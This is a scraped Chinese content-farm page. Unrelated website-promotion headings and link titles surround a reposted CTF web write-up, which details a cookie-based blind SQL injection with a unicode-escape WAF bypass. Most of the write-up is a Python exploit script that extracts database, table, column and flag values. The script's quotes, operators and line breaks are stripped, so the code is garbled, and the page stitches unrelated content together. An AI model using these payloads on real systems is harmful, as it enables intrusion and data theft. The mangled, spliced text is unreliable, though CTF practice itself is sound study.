当前位置: 首页 > news >正文

如何建 网站推广网站怎么做能增加咨询

如何建 网站,推广网站怎么做能增加咨询,购买网址,做网站为什么不要源代码0x00 前言 CTF 加解密合集CTF Web合集网络安全知识库溯源相关 文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取 0x01 题目 0x02 Write Up 首先拿到题目#xff0c;先扫描一下#xff0c;发现一个www.zip 发现一个admin目录#xff0c;访问一下#xff1a; 在m…0x00 前言 CTF 加解密合集CTF Web合集网络安全知识库溯源相关 文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取 0x01 题目 0x02 Write Up 首先拿到题目先扫描一下发现一个www.zip 发现一个admin目录访问一下 在member.php中发现一段代码这段代码中存在sql注入也就是在cookie中的sql注入 有一个要点是在代码中存在waf 这里有一个小知识就是json_decode可以识别unicode代码。那么我们可以将我们的测试poc改为unicode true的话会返回一组 false会返回两组 以此为依据可以进行遍历 脚本用的是大佬写好的脚本 #encodingutf-8 import requestsurl http://f17498a1-535d-45db-8840-09657e3b6c78.challenge.ctf.show/admin/def tamper(payload):payload payload.lower()payload payload.replace(u, \\u0075)payload payload.replace(\, \\u0027)payload payload.replace(o, \\u006f)payload payload.replace(i, \\u0069)payload payload.replace(, \\u0022)payload payload.replace( , \\u0020)payload payload.replace(s, \\u0073)payload payload.replace(#, \\u0023)payload payload.replace(, \\u003e)payload payload.replace(, \\u003c)payload payload.replace(-, \\u002d)payload payload.replace(, \\u003d)payload payload.replace(f1a9, F1a9)payload payload.replace(f1, F1)return payload#get database length def databaseName_len():print (start get database name length...)for l in range(0,45):payload 1 or (length(database()) str(l1) )#print(payload)payload tamper(payload)print(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadprint(tmpCookie)exit()headers {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 1)):print(get db length str(l).lower())break#get content def get_databaseName():flag for j in range(0, 15):for c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (database()) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(databasename flag.lower())break#get content def get_tableName():flag for j in range(0, 30): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select table_name from information_schema.tables where table_schemadatabase() limit 3,1) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(tablename flag.lower())break#get content def get_ColumnName():flag for j in range(0, 10): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select column_name from information_schema.columns where table_nameFL2333G limit 0,1) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(column name flag.lower())break#get content def get_value():flag for j in range(0, 50): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select FLLLLLAG from FL2333G) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(flag flag.lower())breakprint (start database sql injection...) # databaseName_len() # get_databaseName() # get_tableName() # get_ColumnName() get_value()0x03 other 欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源技能树面试题等。 以上
http://www.zqtcl.cn/news/338313/

相关文章:

  • 网站备案 登录名巴中交通建设有限公司网站
  • 门户资源分享网站模板软件网站开发市场前景
  • 海南省住房和城乡建设厅官方网站列举五种常用的网站推广方法
  • aso优化服务平台东莞优化seo
  • 高唐做创建网站的公司网站开发费怎么做账
  • 域名有没有被注册哪个网站最好中企动力网站建设方案
  • 无锡网站制作计划我的世界寻找建筑网站
  • 烟台建设集团招聘信息网站青岛百度公司总部
  • php网站模板怎么用怎么做链接网站
  • 完整网站开发视频教程安丘营销型网站建设
  • 女与男爱做电影网站免费网站外包公司
  • 传统文化传播公司网站建设wordpress 插件开启
  • 哪些网站是做外贸生意的网站建设所需美工
  • 网站建设哪个公司比较好惠州网络问政平台
  • 河南网站备案系统短信广州注册公司程序
  • 苏晋建设集团网站跨专业的简历怎么制作
  • 交互网站怎么做设计师作品网站
  • 国外网站的分析工具有哪些办公室装修计入什么会计科目
  • 手机网站 需求模板3000元建设个人网站
  • 请人做网站域名和主机thinkphp网站开发实战教程
  • 做地产网站哪家好饮料网站建设价格
  • 外管局网站 报告怎么做wordpress 阿里
  • 湘潭做网站 去磐石网络山西自助建站费用低
  • 温州哪里做网站比较好昆明网页制作开发
  • 网站建设淘宝客网站建设与网页设计入门
  • 网站推广营销联系方式俄语免费网站制作
  • 广东企业网站seo点击软件搭建本地网站
  • 商丘做网站的价格专业网站制作哪家强
  • 瑞安微信网站软件公司网站设计与制作
  • 片头网站网站建设服装在线商城实训报告